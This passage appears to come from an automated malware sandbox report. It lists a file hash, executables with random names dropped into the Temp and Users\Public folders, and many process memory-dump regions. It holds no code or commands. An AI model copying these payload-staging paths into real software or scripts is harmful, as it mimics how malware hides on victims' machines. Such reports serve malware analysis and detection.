                  df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                  SHA512

                  1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
                • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
                • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                • \Users\Public\ctx.exe
                • \Users\Public\hed.exe
                • \Users\Public\hed.exe
                • \Users\Public\hed.exe
                • \Users\Public\znl.exe
                • \Users\Public\znl.exe
                • memory/564-15-0x0000000000000000-mapping.dmp
                • memory/768-24-0x0000000000000000-mapping.dmp
                • memory/868-13-0x0000000000000000-mapping.dmp
                • memory/892-309-0x0000000000000000-mapping.dmp
                • memory/948-302-0x0000000000000000-mapping.dmp
                • memory/1044-325-0x0000000002590000-0x0000000002594000-memory.dmp
                  Filesize

                  16KB

                • memory/1044-313-0x0000000000000000-mapping.dmp
                • memory/1064-370-0x0000000000000000-mapping.dmp
                • memory/1108-412-0x0000000002F80000-0x0000000002FCC000-memory.dmp
                  Filesize

                  304KB

                • memory/1108-360-0x0000000000000000-mapping.dmp
                • memory/1112-0-0x0000000000000000-mapping.dmp
                • memory/1148-29-0x0000000071AA0000-0x000000007218E000-memory.dmp
                  Filesize

                  6.9MB

                • memory/1148-19-0x0000000000000000-mapping.dmp
                • memory/1148-173-0x0000000006680000-0x0000000006681000-memory.dmp
                  Filesize

                  4KB

                • memory/1148-44-0x0000000004B00000-0x0000000004B01000-memory.dmp
                  Filesize

                  4KB

                • memory/1176-310-0x0000000000000000-mapping.dmp
                • memory/1200-377-0x0000000000000000-mapping.dmp
                • memory/1260-336-0x0000000000000000-mapping.dmp
                • memory/1276-320-0x0000000000400000-0x0000000000434000-memory.dmp
                  Filesize

                  208KB

                • memory/1276-316-0x0000000000400000-0x0000000000434000-memory.dmp
                  Filesize

                  208KB

                • memory/1276-317-0x0000000000417A8B-mapping.dmp
                • memory/1280-31-0x0000000000000000-mapping.dmp
                • memory/1320-36-0x0000000071AA0000-0x000000007218E000-memory.dmp
                  Filesize

                  6.9MB

                • memory/1320-32-0x0000000000000000-mapping.dmp
                • memory/1320-115-0x0000000006560000-0x0000000006561000-memory.dmp
                  Filesize

                  4KB

                • memory/1364-16-0x0000000000000000-mapping.dmp
                • memory/1372-337-0x0000000000000000-mapping.dmp
                • memory/1624-229-0x000000000043FCC3-mapping.dmp
                • memory/1628-170-0x000000000041A684-mapping.dmp
                • memory/1628-172-0x0000000000400000-0x0000000000425000-memory.dmp
                  Filesize

                  148KB

                • memory/1628-169-0x0000000000400000-0x0000000000425000-memory.dmp
                  Filesize

                  148KB

                • memory/1816-10-0x0000000000000000-mapping.dmp
                • memory/1868-5-0x0000000000000000-mapping.dmp
                • memory/1868-4-0x0000000000000000-mapping.dmp
                • memory/1896-184-0x00000000066B0000-0x00000000066B1000-memory.dmp
                  Filesize

                  4KB

                • memory/1896-37-0x0000000071AA0000-0x000000007218E000-memory.dmp
                  Filesize

                  6.9MB

                • memory/1896-214-0x00000000067F0000-0x00000000067F1000-memory.dmp
                  Filesize

                  4KB

                • memory/1896-222-0x0000000006800000-0x0000000006801000-memory.dmp
                  Filesize

                  4KB

                • memory/1896-34-0x0000000000000000-mapping.dmp
                • memory/1896-189-0x0000000006720000-0x0000000006721000-memory.dmp
                  Filesize

                  4KB

                • memory/1900-11-0x0000000000000000-mapping.dmp
                • memory/1912-8-0x0000000000000000-mapping.dmp
                • memory/1956-25-0x0000000071AA0000-0x000000007218E000-memory.dmp
                  Filesize

                  6.9MB

                • memory/1956-18-0x0000000000000000-mapping.dmp
                • memory/1956-38-0x0000000002560000-0x0000000002561000-memory.dmp
                  Filesize

                  4KB

                • memory/1956-50-0x0000000002740000-0x0000000002741000-memory.dmp
                  Filesize

                  4KB

                • memory/1960-26-0x0000000071AA0000-0x000000007218E000-memory.dmp
                  Filesize

                  6.9MB

                • memory/1960-17-0x0000000000000000-mapping.dmp
                • memory/2000-77-0x0000000006410000-0x0000000006411000-memory.dmp
                  Filesize

                  4KB

                • memory/2000-56-0x0000000005440000-0x0000000005441000-memory.dmp
                  Filesize

                  4KB

                • memory/2000-20-0x0000000000000000-mapping.dmp
                • memory/2000-27-0x0000000071AA0000-0x000000007218E000-memory.dmp
                  Filesize

                  6.9MB

                • memory/2000-83-0x00000000064F0000-0x00000000064F1000-memory.dmp
                  Filesize

                  4KB

                • memory/2000-70-0x0000000006360000-0x0000000006361000-memory.dmp
                  Filesize

                  4KB

                • memory/2000-69-0x0000000005870000-0x0000000005871000-memory.dmp
                  Filesize

                  4KB

                • memory/2000-64-0x0000000005830000-0x0000000005831000-memory.dmp
                  Filesize

                  4KB

                • memory/2004-176-0x0000000000000000-mapping.dmp
                • memory/2028-338-0x00000000004C0000-0x00000000004E4000-memory.dmp
                  Filesize

                  144KB

                • memory/2028-329-0x00000000004B0000-0x00000000004B1000-memory.dmp
                  Filesize

                  4KB

                • memory/2028-327-0x0000000000F60000-0x0000000000F61000-memory.dmp
                  Filesize

                  4KB

                • memory/2028-326-0x0000000073C00000-0x00000000742EE000-memory.dmp
                  Filesize

                  6.9MB

                • memory/2028-323-0x0000000000000000-mapping.dmp
                • memory/2040-263-0x0000000000400000-0x0000000000493000-memory.dmp
                  Filesize

                  588KB

                • memory/2040-261-0x000000000043FCC3-mapping.dmp
                • memory/2040-259-0x0000000000400000-0x0000000000493000-memory.dmp
                  Filesize

                  588KB

                • memory/2172-218-0x0000000000000000-mapping.dmp
                • memory/2196-197-0x0000000000417A8B-mapping.dmp
                • memory/2204-194-0x000000000041A684-mapping.dmp
                • memory/2236-239-0x0000000000000000-mapping.dmp
                • memory/2236-268-0x00000000027D0000-0x00000000027D4000-memory.dmp
                  Filesize

                  16KB

                • memory/2252-246-0x000000000041A684-mapping.dmp
                • memory/2344-301-0x0000000000000000-mapping.dmp
                • memory/2348-386-0x0000000000000000-mapping.dmp
                • memory/2384-436-0x0000000000000000-mapping.dmp
                • memory/2384-504-0x0000000000000000-mapping.dmp
                • memory/2384-574-0x0000000000000000-mapping.dmp
                • memory/2384-572-0x0000000000000000-mapping.dmp
                • memory/2384-570-0x0000000000000000-mapping.dmp
                • memory/2384-568-0x0000000000000000-mapping.dmp
                • memory/2384-566-0x0000000000000000-mapping.dmp
                • memory/2384-564-0x0000000000000000-mapping.dmp
                • memory/2384-562-0x0000000000000000-mapping.dmp
                • memory/2384-560-0x0000000000000000-mapping.dmp
                • memory/2384-558-0x0000000000000000-mapping.dmp
                • memory/2384-556-0x0000000000000000-mapping.dmp
                • memory/2384-554-0x0000000000000000-mapping.dmp
                • memory/2384-552-0x0000000000000000-mapping.dmp
                • memory/2384-550-0x0000000000000000-mapping.dmp
                • memory/2384-548-0x0000000000000000-mapping.dmp
                • memory/2384-546-0x0000000000000000-mapping.dmp
                • memory/2384-544-0x0000000000000000-mapping.dmp
                • memory/2384-542-0x0000000000000000-mapping.dmp
                • memory/2384-540-0x0000000000000000-mapping.dmp
                • memory/2384-538-0x0000000000000000-mapping.dmp
                • memory/2384-536-0x0000000000000000-mapping.dmp
                • memory/2384-534-0x0000000000000000-mapping.dmp
                • memory/2384-532-0x0000000000000000-mapping.dmp
                • memory/2384-530-0x0000000000000000-mapping.dmp
                • memory/2384-528-0x0000000000000000-mapping.dmp
                • memory/2384-526-0x0000000000000000-mapping.dmp
                • memory/2384-524-0x0000000000000000-mapping.dmp
                • memory/2384-522-0x0000000000000000-mapping.dmp
                • memory/2384-520-0x0000000000000000-mapping.dmp
                • memory/2384-518-0x0000000000000000-mapping.dmp
                • memory/2384-516-0x0000000000000000-mapping.dmp
                • memory/2384-514-0x0000000000000000-mapping.dmp
                • memory/2384-512-0x0000000000000000-mapping.dmp
                • memory/2384-510-0x0000000000000000-mapping.dmp
                • memory/2384-508-0x0000000000000000-mapping.dmp
                • memory/2384-506-0x0000000000000000-mapping.dmp
                • memory/2384-502-0x0000000000000000-mapping.dmp
                • memory/2384-500-0x0000000000000000-mapping.dmp
                • memory/2384-498-0x0000000000000000-mapping.dmp
                • memory/2384-496-0x0000000000000000-mapping.dmp
                • memory/2384-494-0x0000000000000000-mapping.dmp
                • memory/2384-492-0x0000000000000000-mapping.dmp
                • memory/2384-490-0x0000000000000000-mapping.dmp
                • memory/2384-488-0x0000000000000000-mapping.dmp
                • memory/2384-486-0x0000000000000000-mapping.dmp
                • memory/2384-484-0x0000000000000000-mapping.dmp
                • memory/2384-482-0x0000000000000000-mapping.dmp
                • memory/2384-480-0x0000000000000000-mapping.dmp
                • memory/2384-478-0x0000000000000000-mapping.dmp
                • memory/2384-476-0x0000000000000000-mapping.dmp
                • memory/2384-474-0x0000000000000000-mapping.dmp
                • memory/2384-472-0x0000000000000000-mapping.dmp
                • memory/2384-470-0x0000000000000000-mapping.dmp
                • memory/2384-468-0x0000000000000000-mapping.dmp
                • memory/2384-466-0x0000000000000000-mapping.dmp
                • memory/2384-464-0x0000000000000000-mapping.dmp
                • memory/2384-462-0x0000000000000000-mapping.dmp
                • memory/2384-460-0x0000000000000000-mapping.dmp
                • memory/2384-458-0x0000000000000000-mapping.dmp
                • memory/2384-456-0x0000000000000000-mapping.dmp
                • memory/2384-454-0x0000000000000000-mapping.dmp
                • memory/2384-413-0x00000000000E0000-0x00000000000E1000-memory.dmp
                  Filesize

                  4KB

                • memory/2384-414-0x0000000000000000-mapping.dmp
                • memory/2384-415-0x00000000001A0000-0x00000000001A1000-memory.dmp
                  Filesize

                  4KB

                • memory/2384-416-0x0000000000000000-mapping.dmp
                • memory/2384-418-0x0000000000000000-mapping.dmp
                • memory/2384-420-0x0000000000000000-mapping.dmp
                • memory/2384-422-0x0000000000000000-mapping.dmp
                • memory/2384-424-0x0000000000000000-mapping.dmp
                • memory/2384-426-0x0000000000000000-mapping.dmp
                • memory/2384-428-0x0000000000000000-mapping.dmp
                • memory/2384-430-0x0000000000000000-mapping.dmp
                • memory/2384-432-0x0000000000000000-mapping.dmp
                • memory/2384-434-0x0000000000000000-mapping.dmp
                • memory/2384-452-0x0000000000000000-mapping.dmp
                • memory/2384-438-0x0000000000000000-mapping.dmp
                • memory/2384-440-0x0000000000000000-mapping.dmp
                • memory/2384-442-0x0000000000000000-mapping.dmp
                • memory/2384-444-0x0000000000000000-mapping.dmp
                • memory/2384-446-0x0000000000000000-mapping.dmp
                • memory/2384-448-0x0000000000000000-mapping.dmp
                • memory/2384-450-0x0000000000000000-mapping.dmp
                • memory/2388-308-0x0000000000000000-mapping.dmp
                • memory/2452-213-0x0000000000000000-mapping.dmp
                • memory/2552-177-0x0000000004300000-0x00000000043B0000-memory.dmp
                  Filesize

                  704KB

                • memory/2552-107-0x0000000000140000-0x0000000000141000-memory.dmp
                  Filesize

                  4KB

                • memory/2552-106-0x0000000071AA0000-0x000000007218E000-memory.dmp
                  Filesize

                  6.9MB

                • memory/2552-244-0x0000000002200000-0x000000000220D000-memory.dmp
                  Filesize

                  52KB

                • memory/2552-103-0x0000000000000000-mapping.dmp
                • memory/2600-109-0x000007FEF87B0000-0x000007FEF8A2A000-memory.dmp
                  Filesize

                  2.5MB

                • memory/2684-119-0x0000000000000000-mapping.dmp
                • memory/2696-311-0x0000000000000000-mapping.dmp
                • memory/2708-389-0x0000000004C50000-0x0000000004C52000-memory.dmp
                  Filesize

                  8KB

                • memory/2708-368-0x0000000000000000-mapping.dmp
                • memory/2708-372-0x0000000073860000-0x0000000073F4E000-memory.dmp
                  Filesize

                  6.9MB

                • memory/2708-375-0x0000000000FD0000-0x0000000000FD1000-memory.dmp
                  Filesize

                  4KB

                • memory/2708-378-0x00000000001F0000-0x00000000001F1000-memory.dmp
                  Filesize

                  4KB

                • memory/2708-381-0x0000000000200000-0x0000000000211000-memory.dmp
                  Filesize

                  68KB

                • memory/2708-388-0x0000000000450000-0x0000000000453000-memory.dmp
                  Filesize

                  12KB

                • memory/2708-390-0x00000000005C0000-0x00000000005D1000-memory.dmp
                  Filesize

                  68KB

                • memory/2716-124-0x0000000000000000-mapping.dmp
                • memory/2756-130-0x0000000000000000-mapping.dmp
                • memory/2780-135-0x0000000000000000-mapping.dmp
                • memory/2812-254-0x0000000000417A8B-mapping.dmp
                • memory/2820-408-0x0000000004AC0000-0x0000000004AC1000-memory.dmp
                  Filesize

                  4KB

                • memory/2820-403-0x0000000000000000-mapping.dmp
                • memory/2820-409-0x0000000002790000-0x0000000002791000-memory.dmp
                  Filesize

                  4KB

                • memory/2820-406-0x0000000073860000-0x0000000073F4E000-memory.dmp
                  Filesize

                  6.9MB

                • memory/2820-410-0x00000000029D0000-0x00000000029D1000-memory.dmp
                  Filesize

                  4KB

                • memory/2820-407-0x00000000023A0000-0x00000000023A1000-memory.dmp
                  Filesize

                  4KB

                • memory/2828-357-0x0000000001210000-0x0000000001211000-memory.dmp
                  Filesize

                  4KB

                • memory/2828-404-0x00000000005E0000-0x0000000000604000-memory.dmp
                  Filesize

                  144KB

                • memory/2828-402-0x0000000000590000-0x00000000005B3000-memory.dmp
                  Filesize

                  140KB

                • memory/2828-353-0x0000000000000000-mapping.dmp
                • memory/2828-356-0x0000000073860000-0x0000000073F4E000-memory.dmp
                  Filesize

                  6.9MB

                • memory/2844-144-0x0000000000000000-mapping.dmp
                • memory/2856-147-0x0000000000400000-0x0000000000498000-memory.dmp
                  Filesize

                  608KB

                • memory/2856-155-0x0000000000400000-0x0000000000498000-memory.dmp
                  Filesize

                  608KB

                • memory/2856-149-0x000000000043FCC3-mapping.dmp
                • memory/2876-148-0x0000000000417A8B-mapping.dmp
                • memory/2876-146-0x0000000000400000-0x0000000000439000-memory.dmp
                  Filesize

                  228KB

                • memory/2876-154-0x0000000000400000-0x0000000000439000-memory.dmp
                  Filesize

                  228KB

                • memory/2880-393-0x0000000073860000-0x0000000073F4E000-memory.dmp
                  Filesize

                  6.9MB

                • memory/2880-391-0x0000000000000000-mapping.dmp
                • memory/2880-394-0x0000000002330000-0x0000000002331000-memory.dmp
                  Filesize

                  4KB

                • memory/2880-395-0x00000000048F0000-0x00000000048F1000-memory.dmp
                  Filesize

                  4KB

                • memory/2880-396-0x0000000004850000-0x0000000004851000-memory.dmp
                  Filesize

                  4KB

                • memory/2880-397-0x0000000005420000-0x0000000005421000-memory.dmp
                  Filesize

                  4KB

                • memory/2944-158-0x0000000000000000-mapping.dmp
                • memory/2996-162-0x000000000043FCC3-mapping.dmp
                • memory/3016-382-0x00000000002D0000-0x00000000002D5000-memory.dmp
                  Filesize

                  20KB

                • memory/3016-373-0x00000000009B0000-0x00000000009B1000-memory.dmp
                  Filesize

                  4KB

                • memory/3016-380-0x0000000000290000-0x00000000002A2000-memory.dmp
                  Filesize

                  72KB

                • memory/3016-379-0x0000000000280000-0x0000000000281000-memory.dmp
                  Filesize

                  4KB

                • memory/3016-363-0x0000000000000000-mapping.dmp
                • memory/3016-366-0x0000000073860000-0x0000000073F4E000-memory.dmp
                  Filesize

                  6.9MB

                • memory/3032-267-0x0000000000000000-mapping.dmp
                • memory/3032-273-0x0000000000430000-0x0000000000431000-memory.dmp
                  Filesize

                  4KB

                • memory/3032-270-0x0000000071A80000-0x000000007216E000-memory.dmp
                  Filesize

                  6.9MB

                • memory/3032-271-0x00000000010C0000-0x00000000010C1000-memory.dmp
                  Filesize

                  4KB

                • memory/3032-312-0x0000000004890000-0x00000000048E1000-memory.dmp
                  Filesize

                  324KB

                • memory/3036-344-0x0000000000400000-0x0000000000420000-memory.dmp
                  Filesize

                  128KB

                • memory/3036-341-0x0000000000400000-0x0000000000420000-memory.dmp
                  Filesize

                  128KB

                • memory/3036-342-0x000000000041A684-mapping.dmp